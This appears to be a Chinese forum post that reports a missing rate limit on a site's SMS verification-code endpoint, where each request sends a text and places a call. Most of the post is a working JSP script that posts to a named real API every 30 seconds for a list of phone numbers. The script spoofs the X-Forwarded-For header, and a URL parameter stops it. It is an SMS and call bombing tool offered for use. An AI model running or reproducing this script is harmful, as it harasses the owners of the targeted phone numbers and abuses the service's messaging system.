|
某XXX短信验证码未做次数和安全校验漏洞,每请求一次便会自动发一封短信而且打一个电话。
利用代码:
- <%@ page language="java" pageEncoding="UTF-8"%>
- <%@ page isThreadSafe="false" %>
- <%@ page import="java.io.OutputStreamWriter"%>
- <%@ page import="java.net.URLConnection"%>
- <%@ page import="java.net.URL"%>
- <%@ page import="java.util.*"%>
- <%!
- private static Timer t = new Timer();
- void test(){
- String[] str = "1321344xxx,134555455xxxx".split(",");//手机号,分开
- for(String s:str){
- try{
- URLConnection u = new URL("http://www.kuaidadi.com/phone/api.php").openConnection();
- u.setDoInput(true);
- u.setDoOutput(true);
- u.setConnectTimeout(3000);
- u.setReadTimeout(3000);
- u.setRequestProperty("x-forwarded-for", "12.34.12.34");
- OutputStreamWriter osw = new OutputStreamWriter(u.getOutputStream(), "UTF-8");
- osw.write("mobile="+s+"&act=get_verify_code&sourceid=11");
- osw.flush();
- osw.close();
- u.getOutputStream();
- u.getInputStream();
- }catch(Exception e){
- }
- }
- }
-
- void startX(){
- t.schedule(new java.util.TimerTask() {
- public void run() {
- test();
- }
- }, 0, 30000);
- }
- %>
- <%
- try{
- if("cancel".equals(request.getParameter("action"))){
- t.cancel();
- out.println("stop....");
- }else{
- t = new Timer();
- startX();
- }
- }catch(Exception e){
- out.println(e.toString());
- }
- %>
复制代码
如果想停止发送:http://www.xxx.cn/sm.jsp?action=cancel |
|